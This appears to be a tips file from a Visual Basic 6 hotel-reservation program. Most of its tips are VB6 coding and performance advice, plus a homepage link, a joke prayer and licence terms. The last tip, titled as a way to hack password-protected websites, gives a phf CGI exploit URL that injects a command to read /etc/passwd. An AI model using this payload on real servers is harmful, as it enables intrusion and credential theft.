[Info]
TotalTips=18
CurrentTip=10
ShowAtStartup=0

[Tips]
Note: Use ~ (single tilde) for Enter key.

Tip1=To change the Date and Time Settings using Hotel Reservation Master, <Double Click> on the Third Panel on the StatusBar where you see the current Date and Time.
Tip2=Referencing a static local variable in a procedure is 2-3 times slower than a regular local, dynamic variable; if you want to really speed up your procedures, convert all static variables into module-level variables.
Tip3=Use the And operator instead of Mod when the divisor is a number in the form 2^N. For instance, there are two methods to extract the least significant byte in an Integer:~~lowByte% = value% Mod 256~lowByte% = value% And 255~~The second one is slightly faster.
Tip4=Use "\" instead of "/" when performing divisions between Integers. The "/" operator returns a Single value, therefore the seemingly efficient line~~C% = A% / B%~~actually requires three implicit conversions, two for converting the operands from Integer to Single (to prepare them for the division) and one to convert the result from Single to Integer (to complete the assignment). If you use the "\" operator you don't incur in this overhead, and the division itself is faster.
Tip5=Fixed-length strings are generally slower than conventional strings, because all VB string functions and operators only recognize conventional strings, thus all fixed-length strings must be transparently converted to and from conventional strings.
Tip6=Don't use an empty For...Next loop to add pauses to your programs; instead, use the Sleep API function, that releases the CPU and lets other apps in the system effectively multitask:~~Declare Sub Sleep Lib "kernel32" (ByVal milliseconds As Long)~' pause for 5 seconds~Sleep 5000
Tip7=The most intuitive way to append a string to the current contents of a TextBox is through the & string operator, as in:~~Text1.Text = Text1.Text && "more text"~~However, you can reach the same result about 4 times faster with the following method:~~Text1.SelStart =  Len(Text1.Text)~Text1.SelText = "more text"
Tip8=If you own the Enterprise Edition you may create a stand-alone Type Library by selecting the "Remote Server Files" checkbox that you find in the Component tab of the Project Properties dialog box. When you then compile the component, Visual Basic will also create two additional files in the same directory as the executable file. One of these two files is the TLB you were looking for.
Tip9=If you are developing an application that plays sounds, you probably want to check that a sound card actually exists. There is an API function that returns the number of sound cards installed in the system. This is an example:~~Private Declare Function waveOutGetNumDevs Lib "winmm.dll" () As Long~If waveOutGetNumDevs() >= 1 Then~       MsgBox "Your system supports a sound card."~Else~       MsgBox "Your system can't play sounds."~End If
Tip10=It is worth knowing that with Visual Basic you can create almost all kinds of software from desktop business applications to corporate applications to games to multimedia titles to COM/ActiveX document, and so on.~~Add to that the ease Visual Basic offers, and you will realize how you ever lived without this wonderful language!
Tip11=Visual Basic 6 supports limited OOP in the form of class modules. It has no direct support for inheritance.~~In order to apply OOP in VB or any other language for that matter, you must think of the application developement cycle in different way. In short, you have to conceptualize your application into various inter related objects.
Tip12=The following two statements are equivalent:~~If (intC=1) Then~     lblTip="hi"~End If~~If (intC=1) Then lblTip="hi"
Tip13=Any variables declared as Public in the module file will be visible to all parts of the project. If you just want to make a variable visible throughout a single form, then you can declare the variable in the [General] section of that form.
Tip14=Make the habit of explicitly declaring variables before you use them. This will help you prevent bugs creeping out of invalid or undeclared variable names.~~To turn on this feature, follow the steps given below:~~1. Click Tools > Options.~2. Click the Editor tab.~3. Turn on the check mark in 'Require Variable Declaration'.~4. Click OK to confirm.
Tip15=Visit our Homepage http://www.rojsoftsolutions.co.nr for more information and downloads.
Tip16=ePrayer~Oh Almighty God....., Help me log on without fretting~Guide me as I'm Interneting, Bless my Downloading and Uploading, Keep My Browser From Exploding~~May my website be protected, Let not my password be rejected, Keep my line connected, And May all my inputs be accepted~~Please keep my programs alive~And remember to backup my Hard drive,~And protect my computer from crashing dive~From a virus make it a nesting hive
Tip17=Terms of Agreement:~~By using this code, you agree to the following terms...~1) You may use this code in your own programs (and may compile it into a program and distribute it in compiled format for languages that allow it) freely and with no charge.~2) You MAY NOT redistribute this code (for example to a web site) without written permission from the original author. Failure to do so is a violation of copyright laws.~3) You may link to this code from another website, but ONLY if it is not wrapped in a frame.~4) You will abide by any additional copyright restrictions which the author may have placed in the code or code's description. 
Tip18=Hacking Password Protected Websites.~~Syntax:~http://www.webpagehere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%~20/etc/passwd
